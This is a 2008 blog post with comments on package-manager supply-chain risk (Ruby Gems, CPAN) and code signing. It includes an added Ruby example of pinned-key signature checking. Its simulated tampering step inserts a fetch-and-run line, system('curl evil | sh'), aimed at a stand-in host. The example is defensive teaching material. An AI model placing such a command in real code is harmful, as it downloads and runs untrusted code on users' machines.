Tim Bray warns of the dangers of Ruby Gems as an attack vector. The risk is that basically anyone can create a Gem and make it available using the gem installer.
I’ll say that this is why real systems administrators detest the various packaging schemes that scripting languages offer. It’s generally a much better practice to manage libraries through the operating system’s centralized packaging system — Red Hat’s RPM, FreeBSD Ports, Debian/Ubuntu’s APT, and so forth. Administrators who want to go beyond the vendor-approved repositories for packages are free to do so, but packages from the vendor list can be installed with relative confidence.
Who knows what to expect from packages from CPAN, PEAR, RubyForge, and the like? (This also ties into my longer argument about why developers are the natural enemy of the systems administrator, but I’ll get into that some other time.)
September 3, 2008 at 12:24 am
One thing any of these packaging systems should steal from yast, yum, apt, etc. is rudimentary code signing. Even the storied CPAN doesn’t support this. (CPANPLUS does, however.) That would go a long way to stopping various real MITM attacks – and I’m including creative programmers among those in the middle.
Using the bundled modules with distribution signatures as a safety is essentially another trusting-trust problem. Where did they download it? It would be foolish to expect that distribution maintainers vet every library.
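A minimal model of what the apt/yum-style signing mentioned in the comment above actually buys, added here as an illustration and not taken from the post, the comments, or any distribution's tooling. It is Ruby because the thread is about gems; the package bytes, both keys and the `install_decision` policy are constructed for the example, and the scheme (an RSA signature over the SHA-256 digest of the package bytes, checked against a pinned public key) stands in for the real distributions' GPG-signed metadata rather than reproducing it.

```ruby
require "openssl"

# Constructed stand-in for the bytes of a package or gem file.
PACKAGE = "example-gem-1.0.0\nlib/example.rb: puts 'hello'\n".b.freeze

# The legitimate publisher's key pair. In a real repository the private half
# lives offline; only the public half is shipped to installers.
PUBLISHER_KEY = OpenSSL::PKey::RSA.new(2048)

# A second key pair standing in for anyone "in the middle" (a compromised
# mirror, or a creative programmer) who can also produce valid-looking signatures.
IMPOSTOR_KEY = OpenSSL::PKey::RSA.new(2048)

# The key the installer trusts. It is fixed at install time, not learned from
# whatever arrives alongside the package.
TRUSTED_PUB = PUBLISHER_KEY.public_key

# Publisher side: sign the SHA-256 digest of the package bytes.
def sign_package(private_key, bytes)
  private_key.sign(OpenSSL::Digest.new("SHA256"), bytes)
end

# Installer side, done right: verify against the pinned public key only.
def verify_package(trusted_pub, bytes, signature)
  trusted_pub.verify(OpenSSL::Digest.new("SHA256"), signature, bytes)
rescue OpenSSL::PKey::PKeyError
  false # malformed signature data counts as a failed check
end

# Installer side, done wrong: verify against a public key that was bundled
# with the download. Anyone who can swap the package can swap the key too.
def naive_verify(bundled_pub, bytes, signature)
  bundled_pub.verify(OpenSSL::Digest.new("SHA256"), signature, bytes)
rescue OpenSSL::PKey::PKeyError
  false
end

# Install policy (hypothetical): install only what verifies under the pinned key.
def install_decision(trusted_pub, bytes, signature)
  verify_package(trusted_pub, bytes, signature) ? :install : :reject
end

# Simulated man-in-the-middle: alter the package and re-sign it with a key the
# attacker controls, shipping that key along as if it were the publisher's.
def mitm_tamper(bytes)
  tampered = bytes + "lib/example.rb: system('curl evil | sh')\n".b
  [tampered, sign_package(IMPOSTOR_KEY, tampered), IMPOSTOR_KEY.public_key]
end

if __FILE__ == $0
  sig = sign_package(PUBLISHER_KEY, PACKAGE)
  puts "genuine package, pinned key:      #{install_decision(TRUSTED_PUB, PACKAGE, sig)}"
  puts "modified bytes, original sig:     #{install_decision(TRUSTED_PUB, PACKAGE + "x".b, sig)}"

  bad_bytes, bad_sig, bad_pub = mitm_tamper(PACKAGE)
  puts "re-signed tamper, pinned key:     #{install_decision(TRUSTED_PUB, bad_bytes, bad_sig)}"
  puts "re-signed tamper, bundled key:    #{naive_verify(bad_pub, bad_bytes, bad_sig) ? 'accepted' : 'rejected'}"
end
```

The last two cases are the caveat behind the "creative programmers among those in the middle" remark: a signature only helps when the installer checks it against a key it already trusts, and a verifier that accepts whatever public key arrives with the download will pass a re-signed tamper. RubyGems does ship an opt-in certificate scheme (`gem cert`, `gem install --trust-policy HighSecurity`), but it only bites when the installer is told to require it.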
September 3, 2008 at 6:10 am
I thought that was supposed to be part of their whole value-add though — because otherwise, why not just use a community-supported distro?
Rafe, I’d love to hear the “developers are the enemy of the sysadmin” post; I’m not sure I agree with you…
September 14, 2008 at 5:10 pm
I’ve only ever seen this as a feature point with security-oriented Linux distributions like Trustix and Engarde. Those distributions tend to base their security model on a framework like SELinux or AppArmor combined with a reduction in packages to reduce the attack surface.
Since many package maintainers seem to handle hundreds of packages, it seems improbable that they do a security audit for each. If they do, it’s certainly not documented well.